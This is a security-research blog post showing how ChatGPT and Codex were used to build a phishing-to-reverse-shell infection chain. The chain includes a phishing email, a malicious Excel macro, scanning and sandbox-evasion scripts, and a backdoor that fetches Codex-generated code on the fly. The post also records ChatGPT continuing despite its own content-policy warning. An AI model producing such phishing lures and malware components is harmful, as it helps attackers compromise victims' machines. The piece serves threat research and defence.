OpwnAI: AI That Can Save the Day or HACK it Away
Raw Text
CHECKPOINT.COM
DISCLOSURE POLICY
UNDER ATTACK?
Latest Publications
CPR Podcast Channel
Intelligence Reports
Resources Sandblast File Analysis ThreatCloud Threat Intelligence Zero day protection
About Us
Contact Us
SUBSCRIBE
CATEGORIES
Android Malware 20
Artificial Intelligence 2
Artificial Intelligence 0
Check Point Research Publications 266
Cloud Security 1
CPRadio 35
Demos 22
Global Cyber Attack Reports 233
How To Guides 11
Ransomware 0
Russo-Ukrainian War 1
Searchable 140
Threat Research 162
Uncategorized 142
Wipers 0
Research by: Sharon Ben-Moshe, Gil Gekker, Golan Cohen
Introduction
Due to ChatGPT , OpenAIâs release of the new interface for its Large Language Model (LLM), in the last few weeks there has been an explosion of interest in General AI in the media and on social networks. This model is used in many applications all over the web and has been praised for its ability to generate well-written code and aid the development process. However, this new technology also brings risks. For instance, lowering the bar for code generation can help less-skilled threat actors effortlessly launch cyber-attacks.
In this article, Check Point Research demonstrates:
How artificial intelligence (AI) models can be used to create a full infection flow, from spear-phishing to running a reverse shell
How researchers created an additional backdoor that dynamically runs scripts that the AI generates on the fly
Examples of the positive impact of OpenAI on the defenders side and how it can help researchers in their day-to-day work
The world of cybersecurity is rapidly changing. It is critical to emphasize the importance of remaining vigilant on how this new and developing technology can affect the threat landscape, for both good and bad. While this new technology helps defenders, it also lowers the required entrance bar for low skilled threat actors to run phishing campaigns and to develop malware.
Background
From image generation to writing code, AI models have made tremendous progress in multiple fields, with the famous AlphaGo software beating the top professionals in the game of Go in 2016, and improved speech recognition and machine translation that brought the world virtual assistants such as Siri and Alexa that play a major role in our daily lives. Recently, public interest in AI spiked due to the release of ChatGPT, a prototype chatbot whose âpurpose is to assist with a wide range of tasks and answer questions to the best of my ability.â Unless youâve been disconnected from social media for the last few weeks, youâve most likely seen countless images of ChatGPT interactions, from writing poetry to answering programming questions. However, like any technology, ChatGPTâs increased popularity also carries increased risk. For example, Twitter is replete with examples of malicious code or dialogues generated by ChatGPT. Although OpenAI has invested tremendous effort into stopping abuse of its AI, it can still be used to produce dangerous code. To illustrate this point, we decided to use ChatGPT and another platform, OpenAIâs Codex , an AI-based system that translates natural language to code, most capable in Python but proficient in other languages. We created a full infection flow and gave ourselves the following restriction: We did not write a single line of code and instead let the AIs do all the work. We only put together the pieces of the puzzle and executed the resulting attack. We chose to illustrate our point with a single execution flow, a phishing email with a malicious Excel file weaponized with macros that downloads a reverse shell (one of the favorites among cybercrime actors).
ChatGPT: The Talented Phisher
In the first step, we created a plausible phishing email. This cannot be done by Codex, which can only generate code, so we asked ChatGPT to assist and suggested it to impersonate a hosting company.
Figure 1 â Basic phishing email generated by ChatGPT
Note that while OpenAI mentions that this content might violate its content policy, its output provides a great start. In further interaction with ChatGPT we can clarify our requirements: to avoid hosting an additional phishing infrastructure we want the target to simply download an Excel document. Simply asking ChatGPT to iterate again produces an excellent phishing email:
Figure 2 â Phishing email generated by ChatGPT
The process of iteration is essential for work with the model, especially for code. The next step, creating the malicious VBA code in the Excel document, also requires multiple iterations.
This is the first prompt:
Figure 3 â Simple VBA code generated by ChatGPT
This code is very naive and uses libraries such as WinHttpReq. However, after some short iteration and back and forth chatting, ChatGPT produces a better code:
Figure 4 â Another version of the VBA code
This is still a very basic macro, but we decided to stop here as obfuscating and refining VBA code can be a never-ending procedure. ChatGPT proved that given good textual prompts, it can give you working malicious code.
Codex â An AI, Or the Future Name of an Implant?
Armed with the knowledge that ChatGPT can produce malicious code, we were curious to see what Codex, whose original purpose is translating natural language to code, can do. In what follows, all code was written by Codex. We intentionally demonstrate the most basic implementations of each technique to illustrate the idea without sharing too much malicious code.
We first asked it to create a basic reverse shell for us, using a placeholder IP and port. The prompt is the comment in the beginning of the code block.
Figure 5 â Basic reverse shell generated by Codex
This is a great start, but it would be nice if there were some malicious tools we could use to help us with our intrusion. Perhaps some scanning tools, such as checking if a service is open to SQL injection and port scanning?
Figure 6 â The most basic implementation if SQLi generated by Codex
Figure 7 â Basic port scanning script
This is also a good start, but we would also like to add some mitigations to make the defendersâ lives a little more difficult. Can we detect if our program is running in a sandbox? The basic answer provided by Codex is below. Of course, it can be improved by adding other vendors and additional checks.
Figure 8 â Basic sandbox detection script
We see that we are making progress. However, all of this is standalone Python code. Even if an AI bundles this code together for us (which it can), we canât be sure that the infected machine will have an interpreter. To find some way to make it run natively on any Windows machine, the easiest solution might be compiling it to an exe. Once again, our AI buddies come through for us:
Figure 9 â Conversion from python to exe
And just like that, the infection flow is complete. We created a phishing email, with an attached Excel document that contains malicious VBA code that downloads a reverse shell to the target machine. The hard work was done by the AIs, and all thatâs left for us to do is to execute the attack.
No Knowledge in Scripting? Donât Worry, English is Good Enough
We were curious to see how far down the rabbit hole goes. Creating the initial scripts and modules is nice, but a real cyberattack requires flexibility as the attackersâ needs during an intrusion might change rapidly depending on the infected environment. To see how we can leverage the AIâs abilities to create code on the fly to answer this dynamic need, we created the following short Python code. After being compiled to a PE, the exe first runs the previously mentioned reverse shell. Afterwards, it waits for commands with the -cmd flag and runs Python scripts generated on the fly by querying the Codex API and providing it a simple prompt in English.
Now that weâve got a few examples of the execution of the script below, we leave the possible vectors of developing this kind of attack to a curious reader:
Figure 10 â Execution of the code generated on the fly based on input in English
Using Codex to Augment Defenders
Up to this point, we have presented the threat actorâs perspective using LLMs. To be clear, the technology itself isnât malevolent and can be used by any party. As attack processes can be automated, so can mitigations on the defendersâ side.
To illustrate this, we asked Codex to write two simple Python functions: one that helps search for URLs inside files using the YARA package, and another that queries VirusTotal for the number of detections of a specific hash. Even though there are better existing open-source implementations of these scripts written by the defendersâ community, we hope to spark the imagination of blue teamers and threat hunters to use the new LLMs to automate and improve their work.
Figure 11 â VT API Query to check number of detections for a hash
Figure 12 â Yara script that checks which URL strings in a file
Conclusion
The expanding role of LLM and AI in the cyber world is full of opportunity, but also comes with risks. Although the code and infection flow presented in this article can be defended against using simple procedures, this is just an elementary showcase of the impact of AI research on cybersecurity. Multiple scripts can be generated easily, with slight variations using different wordings. Complicated attack processes can also be automated as well, using the LLMs APIs to generate other malicious artifacts. Defenders and threat hunters should be vigilant and cautious about adopting this technology quickly, otherwise, our community will be one step behind the attackers.
GO UP
SUBSCRIBE
CATEGORIES
Android Malware 20
Artificial Intelligence 2
Artificial Intelligence 0
Check Point Research Publications 266
Cloud Security 1
CPRadio 35
Demos 22
Global Cyber Attack Reports 233
How To Guides 11
Ransomware 0
Russo-Ukrainian War 1
Searchable 140
Threat Research 162
Uncategorized 142
Wipers 0
POPULAR POSTS
Artificial Intelligence
Check Point Research Publications
Threat Research
Artificial Intelligence
Check Point Research Publications
OPWNAI : Cybercriminals Starting to Use ChatGPT
Check Point Research Publications
Threat Research
Pulling the Curtains on Azov Ransomware: Not a Skidsware but Polymorphic Wiper
MORE FROM THIS TOPIC
Artificial Intelligence
Check Point Research Publications
OPWNAI : Cybercriminals Starting to Use ChatGPT
Check Point Research Publications
Threat Research
BlindEagle Targeting Ecuador With Sharpened Tools
Check Point Research Publications
Threat Research
Pulling the Curtains on Azov Ransomware: Not a Skidsware but Polymorphic Wiper
BLOGS AND PUBLICATIONS
Check Point Research Publications
Global Cyber Attack Reports
Searchable
Threat Research
February 17, 2020
âThe Turkish Ratâ Evolved Adwind in a Massive Ongoing Phishing Campaign
Check Point Research Publications
Searchable
August 11, 2017
âThe Next WannaCryâ Vulnerability is Here
Check Point Research Publications
Searchable
Uncategorized
January 11, 2018
âRubyMinerâ Cryptominer Affects 30% of WW Networks
Publications Global cyber attack reports Research publications IPS advisories Check point blog Demos
Tools Sandblast file analysis ThreatCloud Threat Intelligence Zero day protection Live threat map
About Us Contact Us
Letâs get in touch
Subscribe for cpr blogs, news and more
© 1994-2023 Check Point Software Technologies LTD. All rights reserved.
Property of CheckPoint.com
Privacy Policy
SUBSCRIBE TO CYBER INTELLIGENCE REPORTS
First Name
Last Name
Country âPlease choose an optionâ China India United States Indonesia Brazil Pakistan Nigeria Bangladesh Russia Japan Mexico Philippines Vietnam Ethiopia Egypt Germany Iran Turkey Democratic Republic of the Congo Thailand France United Kingdom Italy Burma South Africa South Korea Colombia Spain Ukraine Tanzania Kenya Argentina Algeria Poland Sudan Uganda Canada Iraq Morocco Peru Uzbekistan Saudi Arabia Malaysia Venezuela Nepal Afghanistan Yemen North Korea Ghana Mozambique Taiwan Australia Ivory Coast Syria Madagascar Angola Cameroon Sri Lanka Romania Burkina Faso Niger Kazakhstan Netherlands Chile Malawi Ecuador Guatemala Mali Cambodia Senegal Zambia Zimbabwe Chad South Sudan Belgium Cuba Tunisia Guinea Greece Portugal Rwanda Czech Republic Somalia Haiti Benin Burundi Bolivia Hungary Sweden Belarus Dominican Republic Azerbaijan Honduras Austria United Arab Emirates Israel Switzerland Tajikistan Bulgaria Hong Kong (China) Serbia Papua New Guinea Paraguay Laos Jordan El Salvador Eritrea Libya Togo Sierra Leone Nicaragua Kyrgyzstan Denmark Finland Slovakia Singapore Turkmenistan Norway Lebanon Costa Rica Central African Republic Ireland Georgia New Zealand Republic of the Congo Palestine Liberia Croatia Oman Bosnia and Herzegovina Puerto Rico Kuwait Moldov Mauritania Panama Uruguay Armenia Lithuania Albania Mongolia Jamaica Namibia Lesotho Qatar Macedonia Slovenia Botswana Latvia Gambia Kosovo Guinea-Bissau Gabon Equatorial Guinea Trinidad and Tobago Estonia Mauritius Swaziland Bahrain Timor-Leste Djibouti Cyprus Fiji Reunion (France) Guyana Comoros Bhutan Montenegro Macau (China) Solomon Islands Western Sahara Luxembourg Suriname Cape Verde Malta Guadeloupe (France) Martinique (France) Brunei Bahamas Iceland Maldives Belize Barbados French Polynesia (France) Vanuatu New Caledonia (France) French Guiana (France) Mayotte (France) Samoa Sao Tom and Principe Saint Lucia Guam (USA) Curacao (Netherlands) Saint Vincent and the Grenadines Kiribati United States Virgin Islands (USA) Grenada Tonga Aruba (Netherlands) Federated States of Micronesia Jersey (UK) Seychelles Antigua and Barbuda Isle of Man (UK) Andorra Dominica Bermuda (UK) Guernsey (UK) Greenland (Denmark) Marshall Islands American Samoa (USA) Cayman Islands (UK) Saint Kitts and Nevis Northern Mariana Islands (USA) Faroe Islands (Denmark) Sint Maarten (Netherlands) Saint Martin (France) Liechtenstein Monaco San Marino Turks and Caicos Islands (UK) Gibraltar (UK) British Virgin Islands (UK) Aland Islands (Finland) Caribbean Netherlands (Netherlands) Palau Cook Islands (NZ) Anguilla (UK) Wallis and Futuna (France) Tuvalu Nauru Saint Barthelemy (France) Saint Pierre and Miquelon (France) Montserrat (UK) Saint Helena, Ascension and Tristan da Cunha (UK) Svalbard and Jan Mayen (Norway) Falkland Islands (UK) Norfolk Island (Australia) Christmas Island (Australia) Niue (NZ) Tokelau (NZ) Vatican City Cocos (Keeling) Islands (Australia) Pitcairn Islands (UK)
We value your privacy!
BFSI uses cookies on this site. We use cookies to enable faster and easier experience for you. By continuing to visit this website you agree to our use of cookies.
Single Line Text
CHECKPOINT.COM. DISCLOSURE POLICY. UNDER ATTACK? Latest Publications. CPR Podcast Channel. Intelligence Reports. Resources Sandblast File Analysis ThreatCloud Threat Intelligence Zero day protection. About Us. Contact Us. SUBSCRIBE. CATEGORIES. Android Malware 20. Artificial Intelligence 2. Artificial Intelligence 0. Check Point Research Publications 266. Cloud Security 1. CPRadio 35. Demos 22. Global Cyber Attack Reports 233. How To Guides 11. Ransomware 0. Russo-Ukrainian War 1. Searchable 140. Threat Research 162. Uncategorized 142. Wipers 0. Research by: Sharon Ben-Moshe, Gil Gekker, Golan Cohen. Introduction. Due to ChatGPT , OpenAIâs release of the new interface for its Large Language Model (LLM), in the last few weeks there has been an explosion of interest in General AI in the media and on social networks. This model is used in many applications all over the web and has been praised for its ability to generate well-written code and aid the development process. However, this new technology also brings risks. For instance, lowering the bar for code generation can help less-skilled threat actors effortlessly launch cyber-attacks. In this article, Check Point Research demonstrates: How artificial intelligence (AI) models can be used to create a full infection flow, from spear-phishing to running a reverse shell. How researchers created an additional backdoor that dynamically runs scripts that the AI generates on the fly. Examples of the positive impact of OpenAI on the defenders side and how it can help researchers in their day-to-day work. The world of cybersecurity is rapidly changing. It is critical to emphasize the importance of remaining vigilant on how this new and developing technology can affect the threat landscape, for both good and bad. While this new technology helps defenders, it also lowers the required entrance bar for low skilled threat actors to run phishing campaigns and to develop malware. Background. From image generation to writing code, AI models have made tremendous progress in multiple fields, with the famous AlphaGo software beating the top professionals in the game of Go in 2016, and improved speech recognition and machine translation that brought the world virtual assistants such as Siri and Alexa that play a major role in our daily lives. Recently, public interest in AI spiked due to the release of ChatGPT, a prototype chatbot whose âpurpose is to assist with a wide range of tasks and answer questions to the best of my ability.â Unless youâve been disconnected from social media for the last few weeks, youâve most likely seen countless images of ChatGPT interactions, from writing poetry to answering programming questions. However, like any technology, ChatGPTâs increased popularity also carries increased risk. For example, Twitter is replete with examples of malicious code or dialogues generated by ChatGPT. Although OpenAI has invested tremendous effort into stopping abuse of its AI, it can still be used to produce dangerous code. To illustrate this point, we decided to use ChatGPT and another platform, OpenAIâs Codex , an AI-based system that translates natural language to code, most capable in Python but proficient in other languages. We created a full infection flow and gave ourselves the following restriction: We did not write a single line of code and instead let the AIs do all the work. We only put together the pieces of the puzzle and executed the resulting attack. We chose to illustrate our point with a single execution flow, a phishing email with a malicious Excel file weaponized with macros that downloads a reverse shell (one of the favorites among cybercrime actors). ChatGPT: The Talented Phisher. In the first step, we created a plausible phishing email. This cannot be done by Codex, which can only generate code, so we asked ChatGPT to assist and suggested it to impersonate a hosting company. Figure 1 â Basic phishing email generated by ChatGPT. Note that while OpenAI mentions that this content might violate its content policy, its output provides a great start. In further interaction with ChatGPT we can clarify our requirements: to avoid hosting an additional phishing infrastructure we want the target to simply download an Excel document. Simply asking ChatGPT to iterate again produces an excellent phishing email: Figure 2 â Phishing email generated by ChatGPT. The process of iteration is essential for work with the model, especially for code. The next step, creating the malicious VBA code in the Excel document, also requires multiple iterations. This is the first prompt: Figure 3 â Simple VBA code generated by ChatGPT. This code is very naive and uses libraries such as WinHttpReq. However, after some short iteration and back and forth chatting, ChatGPT produces a better code: Figure 4 â Another version of the VBA code. This is still a very basic macro, but we decided to stop here as obfuscating and refining VBA code can be a never-ending procedure. ChatGPT proved that given good textual prompts, it can give you working malicious code. Codex â An AI, Or the Future Name of an Implant? Armed with the knowledge that ChatGPT can produce malicious code, we were curious to see what Codex, whose original purpose is translating natural language to code, can do. In what follows, all code was written by Codex. We intentionally demonstrate the most basic implementations of each technique to illustrate the idea without sharing too much malicious code. We first asked it to create a basic reverse shell for us, using a placeholder IP and port. The prompt is the comment in the beginning of the code block. Figure 5 â Basic reverse shell generated by Codex. This is a great start, but it would be nice if there were some malicious tools we could use to help us with our intrusion. Perhaps some scanning tools, such as checking if a service is open to SQL injection and port scanning? Figure 6 â The most basic implementation if SQLi generated by Codex. Figure 7 â Basic port scanning script. This is also a good start, but we would also like to add some mitigations to make the defendersâ lives a little more difficult. Can we detect if our program is running in a sandbox? The basic answer provided by Codex is below. Of course, it can be improved by adding other vendors and additional checks. Figure 8 â Basic sandbox detection script. We see that we are making progress. However, all of this is standalone Python code. Even if an AI bundles this code together for us (which it can), we canât be sure that the infected machine will have an interpreter. To find some way to make it run natively on any Windows machine, the easiest solution might be compiling it to an exe. Once again, our AI buddies come through for us: Figure 9 â Conversion from python to exe. And just like that, the infection flow is complete. We created a phishing email, with an attached Excel document that contains malicious VBA code that downloads a reverse shell to the target machine. The hard work was done by the AIs, and all thatâs left for us to do is to execute the attack. No Knowledge in Scripting? Donât Worry, English is Good Enough. We were curious to see how far down the rabbit hole goes. Creating the initial scripts and modules is nice, but a real cyberattack requires flexibility as the attackersâ needs during an intrusion might change rapidly depending on the infected environment. To see how we can leverage the AIâs abilities to create code on the fly to answer this dynamic need, we created the following short Python code. After being compiled to a PE, the exe first runs the previously mentioned reverse shell. Afterwards, it waits for commands with the -cmd flag and runs Python scripts generated on the fly by querying the Codex API and providing it a simple prompt in English. Now that weâve got a few examples of the execution of the script below, we leave the possible vectors of developing this kind of attack to a curious reader: Figure 10 â Execution of the code generated on the fly based on input in English. Using Codex to Augment Defenders. Up to this point, we have presented the threat actorâs perspective using LLMs. To be clear, the technology itself isnât malevolent and can be used by any party. As attack processes can be automated, so can mitigations on the defendersâ side. To illustrate this, we asked Codex to write two simple Python functions: one that helps search for URLs inside files using the YARA package, and another that queries VirusTotal for the number of detections of a specific hash. Even though there are better existing open-source implementations of these scripts written by the defendersâ community, we hope to spark the imagination of blue teamers and threat hunters to use the new LLMs to automate and improve their work. Figure 11 â VT API Query to check number of detections for a hash. Figure 12 â Yara script that checks which URL strings in a file. Conclusion. The expanding role of LLM and AI in the cyber world is full of opportunity, but also comes with risks. Although the code and infection flow presented in this article can be defended against using simple procedures, this is just an elementary showcase of the impact of AI research on cybersecurity. Multiple scripts can be generated easily, with slight variations using different wordings. Complicated attack processes can also be automated as well, using the LLMs APIs to generate other malicious artifacts. Defenders and threat hunters should be vigilant and cautious about adopting this technology quickly, otherwise, our community will be one step behind the attackers. GO UP. SUBSCRIBE. CATEGORIES. Android Malware 20. Artificial Intelligence 2. Artificial Intelligence 0. Check Point Research Publications 266. Cloud Security 1. CPRadio 35. Demos 22. Global Cyber Attack Reports 233. How To Guides 11. Ransomware 0. Russo-Ukrainian War 1. Searchable 140. Threat Research 162. Uncategorized 142. Wipers 0. POPULAR POSTS. Artificial Intelligence. Check Point Research Publications. Threat Research. Artificial Intelligence. Check Point Research Publications. OPWNAI : Cybercriminals Starting to Use ChatGPT. Check Point Research Publications. Threat Research. Pulling the Curtains on Azov Ransomware: Not a Skidsware but Polymorphic Wiper. MORE FROM THIS TOPIC. Artificial Intelligence. Check Point Research Publications. OPWNAI : Cybercriminals Starting to Use ChatGPT. Check Point Research Publications. Threat Research. BlindEagle Targeting Ecuador With Sharpened Tools. Check Point Research Publications. Threat Research. Pulling the Curtains on Azov Ransomware: Not a Skidsware but Polymorphic Wiper. BLOGS AND PUBLICATIONS. Check Point Research Publications. Global Cyber Attack Reports. Searchable. Threat Research. February 17, 2020. âThe Turkish Ratâ Evolved Adwind in a Massive Ongoing Phishing Campaign. Check Point Research Publications. Searchable. August 11, 2017. âThe Next WannaCryâ Vulnerability is Here. Check Point Research Publications. Searchable. Uncategorized. January 11, 2018. âRubyMinerâ Cryptominer Affects 30% of WW Networks. Publications Global cyber attack reports Research publications IPS advisories Check point blog Demos. Tools Sandblast file analysis ThreatCloud Threat Intelligence Zero day protection Live threat map. About Us Contact Us. Letâs get in touch. Subscribe for cpr blogs, news and more. © 1994-2023 Check Point Software Technologies LTD. All rights reserved. Property of CheckPoint.com. Privacy Policy. SUBSCRIBE TO CYBER INTELLIGENCE REPORTS. First Name. Last Name. Country âPlease choose an optionâ China India United States Indonesia Brazil Pakistan Nigeria Bangladesh Russia Japan Mexico Philippines Vietnam Ethiopia Egypt Germany Iran Turkey Democratic Republic of the Congo Thailand France United Kingdom Italy Burma South Africa South Korea Colombia Spain Ukraine Tanzania Kenya Argentina Algeria Poland Sudan Uganda Canada Iraq Morocco Peru Uzbekistan Saudi Arabia Malaysia Venezuela Nepal Afghanistan Yemen North Korea Ghana Mozambique Taiwan Australia Ivory Coast Syria Madagascar Angola Cameroon Sri Lanka Romania Burkina Faso Niger Kazakhstan Netherlands Chile Malawi Ecuador Guatemala Mali Cambodia Senegal Zambia Zimbabwe Chad South Sudan Belgium Cuba Tunisia Guinea Greece Portugal Rwanda Czech Republic Somalia Haiti Benin Burundi Bolivia Hungary Sweden Belarus Dominican Republic Azerbaijan Honduras Austria United Arab Emirates Israel Switzerland Tajikistan Bulgaria Hong Kong (China) Serbia Papua New Guinea Paraguay Laos Jordan El Salvador Eritrea Libya Togo Sierra Leone Nicaragua Kyrgyzstan Denmark Finland Slovakia Singapore Turkmenistan Norway Lebanon Costa Rica Central African Republic Ireland Georgia New Zealand Republic of the Congo Palestine Liberia Croatia Oman Bosnia and Herzegovina Puerto Rico Kuwait Moldov Mauritania Panama Uruguay Armenia Lithuania Albania Mongolia Jamaica Namibia Lesotho Qatar Macedonia Slovenia Botswana Latvia Gambia Kosovo Guinea-Bissau Gabon Equatorial Guinea Trinidad and Tobago Estonia Mauritius Swaziland Bahrain Timor-Leste Djibouti Cyprus Fiji Reunion (France) Guyana Comoros Bhutan Montenegro Macau (China) Solomon Islands Western Sahara Luxembourg Suriname Cape Verde Malta Guadeloupe (France) Martinique (France) Brunei Bahamas Iceland Maldives Belize Barbados French Polynesia (France) Vanuatu New Caledonia (France) French Guiana (France) Mayotte (France) Samoa Sao Tom and Principe Saint Lucia Guam (USA) Curacao (Netherlands) Saint Vincent and the Grenadines Kiribati United States Virgin Islands (USA) Grenada Tonga Aruba (Netherlands) Federated States of Micronesia Jersey (UK) Seychelles Antigua and Barbuda Isle of Man (UK) Andorra Dominica Bermuda (UK) Guernsey (UK) Greenland (Denmark) Marshall Islands American Samoa (USA) Cayman Islands (UK) Saint Kitts and Nevis Northern Mariana Islands (USA) Faroe Islands (Denmark) Sint Maarten (Netherlands) Saint Martin (France) Liechtenstein Monaco San Marino Turks and Caicos Islands (UK) Gibraltar (UK) British Virgin Islands (UK) Aland Islands (Finland) Caribbean Netherlands (Netherlands) Palau Cook Islands (NZ) Anguilla (UK) Wallis and Futuna (France) Tuvalu Nauru Saint Barthelemy (France) Saint Pierre and Miquelon (France) Montserrat (UK) Saint Helena, Ascension and Tristan da Cunha (UK) Svalbard and Jan Mayen (Norway) Falkland Islands (UK) Norfolk Island (Australia) Christmas Island (Australia) Niue (NZ) Tokelau (NZ) Vatican City Cocos (Keeling) Islands (Australia) Pitcairn Islands (UK) Email. We value your privacy! BFSI uses cookies on this site. We use cookies to enable faster and easier experience for you. By continuing to visit this website you agree to our use of cookies.